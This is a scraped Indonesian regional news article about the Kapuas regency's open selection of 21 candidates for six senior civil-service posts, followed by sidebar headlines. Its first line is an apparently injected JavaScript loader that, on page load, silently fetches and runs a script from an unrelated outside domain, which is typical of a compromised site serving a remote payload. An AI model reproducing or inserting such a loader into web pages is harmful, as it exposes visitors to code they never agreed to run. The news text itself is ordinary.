(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

BKPSDM Kapuas Gelar Seleksi Terbuka, 21 Peserta Incar 6 Jabatan Pimpinan Tinggi Pratama


KANALKALIMANTAN.COM, KUALA KAPUAS – Pemerintah Kabupaten (Pemkab) Kapuas melalui Badan Kepegawaian dan Pengembangan Sumber Daya Manusia (BKPSDM) Kapuas membuka seleksi terbuka jabatan pimpinan tinggi pratama.

Sebanyak 21 peserta yang telah dinyatakan lolos seleksi administrasi mulai mengikuti jalannya seleksi lanjutan, yaitu penyusunan penulisan makalah, di aula BKPSDM Kapuas, Selasa (14/2/2023).

Kegiatan ditinjau langsung oleh Bupati Kapuas, Ir Ben Brahim S Bahat.

Kepala BKPSDM Kapuas Komari mengatakan, seleksi terbuka dilaksanakan dalam rangka menentukan aparatur yang memiliki kapasitas, kompetensi, dan integritas memadai untuk mengisi jabatan pada suatu instansi tertentu, sehingga dapat melaksanakan tugas yang lebih efektif dan efisien.

 

Baca juga: RD Bawa Laskar Antasari Gilas Mantan Tim Besutan

“Juga dalam rangka mengisi kekosongan jabatan pimpinan tinggi di lingkup Pemerintah Kabupaten Kapuas, serta pelaksanaan kegiatan berpedoman pada ketentuan-ketentuan yang berlaku,” kata Komari.

Komari juga mengungkapkan terdapat 8 jabatan yang lowong atau sementara ini dijabat pelaksana tugas, sehingga dilakukan seleksi. Di antaranya Sekretaris DPRD Kapuas, Kepala Dinas P3APPKB, Kepala Dinas Lingkungan Hidup Kapuas, Kepala Dinas Penanaman Modal dan Pelayanan Terpadu Satu Pintu, Kepala Dinas Pertanian, Kepala Dinas Kominfo, Kepala Dinas Kependudukan dan Pencatatan Sipil Kapuas, dan Kepala Dinas Kesehatan Kapuas.

Hanya saja, berdasarkan berita acara panitia seleksi nomor : 13/pansel/jpt.2023 tanggal 11 Februari 2023 bahwa sampai dengan batas akhir pendaftaran ada 2 formasi jabatan yang tidak terisi.

“Karena sampai dengan 10 Februari 2023 hanya terdapat 6 jabatan yang terisi. Sehingga, dua jabatan, yaitu Kepala Dinas Kesehatan dan Kepala Dinas Kependudukan dan Pencatatan Sipil tak terisi. Pelamarnya ada, tetapi tidak memenuhi persyaratan,” ucapnya.

Baca juga: Kiprah Srikandi PLN Dukung Pemberdayaan Perempuan Disabilitas Lewat UMKM Teras Ecoprint

Sehingga akhirnya 6 formasi jabatan tersebut saja diputuskan yang bisa dilanjutkan ke tahapan berikutnya.

“Untuk jumlah peserta yang melamar awalnya berjumlah 30 orang, dan setelah dilakukan seleksi administrasi, maka 21 orang dinyatakan lulus untuk bisa mengikuti tahapan-tahapan selanjutnya,” jelasnya.

Adapun dalam seleksi terbuka ini terdapat sejumlah tahapan, yaitu seleksi administrasi, penyusunan penulisan makalah, assesment center uji kompetensi, dan wawancara akhir.

Sedangkan, untuk Tim Panitia Seleksi Jabatan Pimpinan Tinggi Pratama lingkungan Pemkab Kapuas ini diketuai oleh Prof Dr Danes Jaya Negara SE MSc CEIA dari UPR, bersama Prof Dr Eddy Lion MPd, Drs Septedy MSi (Sekda Kapuas), Vitrianson SSos MA, dan Drs H Ali Damrah MSi. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Risa

Recent Posts

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

3 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

14 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

16 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

16 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

17 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

18 jam ago

This website uses cookies.